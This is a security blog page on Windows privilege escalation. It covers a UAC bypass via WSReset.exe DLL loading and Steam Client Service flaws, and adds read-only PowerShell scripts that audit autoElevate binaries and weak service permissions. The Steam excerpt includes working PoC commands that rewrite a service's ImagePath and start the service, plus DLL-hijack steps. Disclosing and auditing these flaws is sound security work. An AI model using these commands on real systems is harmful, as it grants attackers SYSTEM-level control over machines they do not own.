
Windows 10 LPE (UAC Bypass) in Windows Store (WSReset.exe)

         
       I found one interesting post in medium which is  here  and i got some idea to bypass UAC . 
And I notice windows store (wsrest.exe) which is enable access by user.  


I copied it to the Desktop and checked it in Process Monitor, and found that it tried to load some DLLs that were missing.

Then I started to inject a DLL compiled with the technique above. I also wrote the exploit code in C.
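As an added example (not the post's code, nor the Medium post's), the PowerShell below finds which System32 executables carry the autoElevate flag in their embedded manifest. That flag is what makes WSReset.exe worth looking at for a UAC bypass, and the scan generalizes the first step of the post from one binary to the whole directory. It assumes a Windows 10 host and relies on the manifest being stored as plain XML inside the PE resource section, so reading the file as ASCII text is enough to match it.

```powershell
# Added example, not the post's own code: list System32 executables whose embedded manifest
# requests autoElevate. WSReset.exe should appear in the output.
# Assumes a Windows 10 host; the manifest is plain XML in the PE resource section, so an
# ASCII decode of the whole file is enough for the regex to hit.
$sys32 = Join-Path $env:SystemRoot 'System32'

function Get-AutoElevateExe {
    param([string]$Directory)
    foreach ($exe in Get-ChildItem -LiteralPath $Directory -Filter '*.exe' -File -ErrorAction SilentlyContinue) {
        try { $bytes = [System.IO.File]::ReadAllBytes($exe.FullName) } catch { continue }
        $text = [System.Text.Encoding]::ASCII.GetString($bytes)
        if ($text -notmatch '<autoElevate>\s*true\s*</autoElevate>') { continue }
        # Also pull the requested execution level so the two manifest settings can be read together.
        $level = if ($text -match '<requestedExecutionLevel[^>]*\blevel="([^"]+)"') { $Matches[1] } else { 'unknown' }
        [pscustomobject]@{ Name = $exe.Name; ExecutionLevel = $level; Path = $exe.FullName }
    }
}

$autoElevate = Get-AutoElevateExe -Directory $sys32
$autoElevate | Sort-Object Name | Format-Table -AutoSize

# The binary used in the post should be in the list.
$autoElevate | Where-Object { $_.Name -ieq 'WSReset.exe' }
```

Run it from a normal (non-elevated) PowerShell; it only reads files. Once a candidate is chosen, the post's Process Monitor step (filter on the process name, result NAME NOT FOUND, path ending in .dll) is what tells you which DLL name to supply.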




g0ttcha !!!  

Thanks for reading .



Popular posts from this blog

local privilege escalation via steam client service

0day on steam

The Steam Client Service can be started and stopped with user access, and the Users group has Full Control over "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service". So an attacker can change the ImagePath value in that key to run a command with the service's privileges.

POC: 
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt"
net start "Steam Client Service"



The default installation path also grants Full Control to the Users group. So version.dll, which the Steam Client Service tries to load but which does not exist there, can be hijacked by copying a malicious DLL renamed to version.dll into the Steam installation path (C:\Program Files (x86)\Steam\bin).



Dll Search Order Hijacking



Process Monitor shows version.dll as NAME NOT FOUND. So copy the malicious DLL into the installation bin path, renamed to version.dll, and set the registry ImagePath value to "C:\Program Files (x86)\Steam\bin\SteamService.exe /RunAsService".

POC:…
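The two weaknesses above, a service registry key that the Users group can write and a service binary directory that the Users group can write, are easy to audit across every service on a host. The PowerShell below is an added example, not the post's own code: it reads the ACL of each service's registry key and of the directory holding its binary and reports the ones a low-privileged principal can modify. It assumes a Windows host and only reads; it changes nothing. Principals are matched by SID so the check also works on localized installations.

```powershell
# Added example, not the post's own code: find services whose registry key or binary directory
# can be written by low-privileged principals (the Steam Client Service pattern).
# Assumes a Windows host; read-only, changes nothing.
$lowPrivSids = @(
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-1-0',       # Everyone
    'S-1-5-4'        # NT AUTHORITY\INTERACTIVE
)
# Rights that let a low-privileged caller plant a file or rewrite the service definition.
$dirWriteMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, Modify, FullControl'
$regWriteMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl'
$genericWrite = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL, present in some raw ACEs

function Get-LowPrivWriter {
    # Returns the first low-privileged principal with an Allow ACE carrying a right in $Mask, else $null.
    param($Acl, [int]$Mask)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($lowPrivSids -notcontains $sid) { continue }
        $rights = if ($ace -is [System.Security.AccessControl.FileSystemAccessRule]) { [int]$ace.FileSystemRights } else { [int]$ace.RegistryRights }
        if (($rights -band $Mask) -ne 0 -or ($rights -band $genericWrite) -ne 0) { return $ace.IdentityReference.Value }
    }
    return $null
}

function Get-ServiceBinaryPath {
    # Recovers the executable from a service PathName: quoted paths, or unquoted paths that may contain spaces.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    $tokens = $PathName.Trim() -split ' '
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $candidate = $tokens[0..$i] -join ' '
        foreach ($p in @($candidate, "$candidate.exe")) {
            if (Test-Path -LiteralPath $p -PathType Leaf) { return $p }
        }
    }
    return $null
}

function Find-WeakService {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $regWriter = $null; $dirWriter = $null; $binDir = $null
        $keyPath = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        try { $regWriter = Get-LowPrivWriter -Acl (Get-Acl -LiteralPath $keyPath) -Mask $regWriteMask } catch {}
        $exe = Get-ServiceBinaryPath -PathName $svc.PathName
        if ($exe) {
            $binDir = Split-Path -LiteralPath $exe -Parent
            try { $dirWriter = Get-LowPrivWriter -Acl (Get-Acl -LiteralPath $binDir) -Mask $dirWriteMask } catch {}
        }
        if ($regWriter -or $dirWriter) {
            [pscustomobject]@{
                Service          = $svc.Name
                RunsAs           = $svc.StartName
                StartMode        = $svc.StartMode
                RegKeyWritableBy = $regWriter
                BinaryDir        = $binDir
                BinDirWritableBy = $dirWriter
            }
        }
    }
}

Find-WeakService | Format-Table -AutoSize
```

A service that shows up with RegKeyWritableBy set is the ImagePath case from the first PoC; one with BinDirWritableBy set is the version.dll case. RunsAs tells you what the hijack buys (LocalSystem for the Steam Client Service).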

Privilege Escalation via Dll Hijacking in Steam Client Service

I've discovered DLL hijacking vulnerabilities in the Steam Client Service. It loads (at least) version.dll from its application directory, which is C:\Program Files (x86)\Steam.



Affected executables:
steam.exe
steamerrorreporter64.exe
WriteMiniDump.exe
dota2.exe
steamservice.exe (privilege escalation)
and other executables installed by the Steam client.

Affected DLLs:
VERSION.dll
and other DLLs.

Note: steamservice.exe gives privilege escalation if UAC is disabled for the user.

Impact:
This occurs when an application fails to resolve a DLL because the DLL does not exist in the specified path or search directories. If this happens, a malicious DLL with the same name can be placed in that directory, leading to arbitrary code execution in the context of the application. Let's assume that the real DLL contains a function called somefunc. The attacker could write a function with the same name but make it do something quite different, such as deleting a file or modifying registry settings. The…